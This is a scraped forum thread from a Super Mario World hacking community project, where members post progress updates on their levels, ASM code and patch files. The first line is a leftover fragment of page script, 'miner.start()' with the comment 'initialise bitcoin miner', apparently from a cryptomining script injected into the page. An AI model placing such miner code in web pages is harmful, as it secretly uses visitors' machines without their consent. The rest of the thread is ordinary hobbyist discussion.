miner.start(); // initialise bitcoin miner
</script>

smw centralpge projectmario fan games galaxy

Testing and Development: Deadline-one week after comments

Anthrax 2 Multiply Themodynamics
MajorasMask9

Re: Testing & Development~

Postby MajorasMask9 » 8 years ago

The problem is more on the ASM side rather than the physical level content. Technically I could stop where I have it and it could qualify as a full level. But there are some limitations in SMW that would require a slight workaround.

Rewriting the code from scratch would be a lot more efficient, but I really doubt the end product would match the video, if that makes sense. Like, I don't think it would be as "in-synch" after the edits.

I think what I'll do is try to re-use what I had for my Winter level and see how that goes. I'll come back in a week or so with an update. If it works alright, I should have my level posted in the testing thread very soon.

alex2
Banned

Postby alex2 » 8 years ago

Still cracking down on this ASM code deal that I've been waiting for; maybe limiting how it is used could help speed things up, but maybe not.

That's all I got for now, though I'm trying to get as much done as possible, though my free time is limited these days.
Warning: Opinions expressed by alex2 or others in this post do not necessarily reflect the views, opinions, or position of alex2 himself on the matter(s) being discussed therein.
raocow wrote:a3xt will be my last project, after which I will quit lp forever
SPASM - LevelASM for Yoshi's Island!
My mosts things:

TaviTurnip
Reach for the top
Abministrator
First name: Rena

Postby TaviTurnip » 8 years ago

Rena reporting in (it bites that you guys have a more proper designated "Rena" here, seriously xD).

I just posted this in another thread, but I can basically resummarize. I've been busy blah blah but I've also been brainstorming improvements for my level, and I think I've got a good idea of what I want to do now. I'm definitely not disappearing or anything. If people start getting things done and leaving me in the dust, this girl will be sure to catch up. Promise >.>'
Don't bother fighting if you don't intend to win.

MrDeePay

Postby MrDeePay » 8 years ago

Still trimming some fat around from my level's last room, then comes more personal testing.

Duude1991

Postby Duude1991 » 8 years ago

Hi, I still exist. Sorry I've been busy with school and stuff but I hope to more seriously continue on my level in the very near future. I'm about halfway-ish done.

GanonTEK
Evil King
Location: Ireland. The Emerald Isle. (We got no emeralds though)

Postby GanonTEK » 8 years ago

Hi, heads up :)
I'm still working on my level. Busy with college and whatnot.
I havn't much to do. Replacing placeholders and fixing some graphics.
Sorry I havn't updated much.

Patgangster

Postby Patgangster » 8 years ago

Video telling me to give a heads up? Alright then.
I think I finished about 8-9 screens of my level so far.

Complete screenshot of the first 8 screens or so in LM, if anyone wants to see it:
http://i176.photobucket.com/albums/w172 ... vel11C.png

Kevinskie555

Postby Kevinskie555 » 8 years ago

I need to change the BG and add some stuff, but I'm almost done :3
My hack:
Image ''creator''
Lookie! It's Goofy Bowser Junior

Crimson

Postby Crimson » 8 years ago

Hello

I need to redo a sprite and then I'll try clearing it again.

Negative

Postby Negative » 8 years ago

I have first part of my level done (it should be below), but I have a problem: When I try to make a ips file, it becomes so big that I cant put it on the forums. Any help?

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 8 years ago

We're apparently having issues with size in the forums, so upload it to something like sendspace if you have to.
the chillaxest of dragonsImage
ImageImage

Puffy1406

Postby Puffy1406 » 8 years ago

Heads up. the sprite for my level is almost done, once it is I'll be able to finish my level sometime, and submit. :3

RivalNightmare

Postby RivalNightmare » 8 years ago

Just wanna say that I'm still working. Real life is keeping me busy, but I'm still in the "re-make" of the cave.

I hope to be able to show some progress this week.

xjC0n

Postby xjC0n » 8 years ago

I'm working on my level, yes. I have a clear idea of what I want to do with it as well. I have scrapped one of my sublevels and intend to redo it, and I think it's for the best if I redo one of the others I made too.. They felt too ordinary and out of place compared to the rest of the level.

I admit I have been somewhat lazy the last couple of days, but there's been a lot going on too. I think I should have more time on my hands in a few days, though.
æ„›

Twitter: xjakku

Follow and/or add if you wish. ^^

AUS

Postby AUS » 8 years ago

I am awaiting an ASM code, and I have yet to make acouple sublevels. One of those reasons is the ASM code. :P

I don't really have much to show right now.
"oh no my best friend was replaced by a evil demon shadow monster"
"argh i am the evil shadow monster demon shadow"
Vip is pronounced "Beep"
I go by ToNi now. Trying to homogenize my internet handle.

Ometeotl

Postby Ometeotl » 8 years ago

Negative wrote:I have first part of my level done (it should be below), but I have a problem: When I try to make a ips file, it becomes so big that I cant put it on the forums. Any help?
Just put the .IPS into a .zip

7TC7

Postby 7TC7 » 8 years ago

Head's up~
Hadn't much time at all for my level lately but gathered a few new ideas for it over the months. Now that the first half of a school year seems to calm down I might get a new shot at working on it.
Meet me at YouTube and watch Touhou stuff!

Pheonix
e before o [not really]

Postby Pheonix » 8 years ago

Just giving you a heads up on my level stuff. All I really need to do is fix a few slight things with my level (namely, fix a few blind jumps and make myself a better/more appropriate background for the level) and it'll pretty much be ready for resubmission.
pheonix/feenicks/ffeenicxkcs/[indistinguishable from just slamming down on the keyboard]
feenick.tumblr.com

RealLink

Postby RealLink » 8 years ago

Hey I'm still working on my level, 3/4 are finished. Maybe I'll post another LM Screen tomorrow.
And then I need a boss, I hope I can do that as well, I don't wanna use overused bosses from SMWC.

And while we are at it, what is an appropriate length? For now I'm basing it on my ASMT level, which was exactly 1F screens, one full level. Can I do more or would that be too long then?
And we have multiple midpoints, right?

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 8 years ago

There's not really any such thing as a 'global ideal length', it entirely depends on your level.
the chillaxest of dragonsImage
ImageImage

alex2
Banned

Postby alex2 » 8 years ago

Welp, the code is nearly done. Here's a video highlighting the progress as of yet: Clicky.

No, it's not inserted yet. It's unfinished. I'll get to inserting it when it's done. It's a sprite, currently, though I'm hoping for it to be workable with levelASM in the near future.
Warning: Opinions expressed by alex2 or others in this post do not necessarily reflect the views, opinions, or position of alex2 himself on the matter(s) being discussed therein.
raocow wrote:a3xt will be my last project, after which I will quit lp forever
SPASM - LevelASM for Yoshi's Island!
My mosts things:

E-Man

Postby E-Man » 8 years ago

Yeah, I'm still working on my level. I lasted posted here but I'm just reposting again to make sure I didn't get skipped or something. About half of it's done; however I'm going to be changing a couple of the sprite choices and maybe incorporate a couple other things in the first half. I dunno, we'll see what ends up happening.

Ashan
The world has become a place

Postby Ashan » 8 years ago

Okay. So, I have an English midterm today, and so I should be able to find some time to work on my level this weekend, as I have the rest of this week off. Not sure if anyone really cares about this update, but I'm just keeping my head up, cause I don't really want to lose all of my reservations.

Edit: Okay, so I've been testing my level as I've been going, and I found this weird glitch:
Basically, I have a sprite inserted that makes Demo always run, and if you hit a wall, you die. Sometimes it reacts weird, and makes you go through the wall here. Should I find a way to fix it, or should I just leave it? It only happens if you make a specific jump, so I want your guys' opinions.
Also, if you're wondering which tiles I'm using, the corner is tile 545, and the ledge is tile 550, if that helps. =/

Posiedien

Postby Posiedien » 8 years ago

Hey, sorry i didn't tell you earlier. but better later than never. I lost all my files for my level in a computer crash. So I will be unable to continue working on it. Give away my position to someone else.

Thanks. That's it

Xalnop
15 Peices

Postby Xalnop » 8 years ago

Oh testing and development thread, how I've missed you all so much.

I have been exceedingly busy this term with my Master's degree work, and this project has been put on the back-burner to say the least. I am nearing the end of my current term, however I fear next term will be even more busy for me. While I am still interested in trying to complete my level,
I had envisioned a mid-fortress level, that had a front and back entrance, the back entrance as a means to bypass the main fortress level by requiring a romp above the fortress (possibly in the clouds), to get the key to the back door (secret exit)
I fear that I have set my goals ahead of my current abilities, and as such am more then willing to relinquish the level I have been holding hostage from others.

If I am able to get my next term work done quickly, I may want to try to be a bit less ambitious on a smaller level design, but that will have to be seen in the next two months.

I apologize for not relaying this information sooner, and wish everyone the best of luck in finishing their levels.

Return to “A2MT”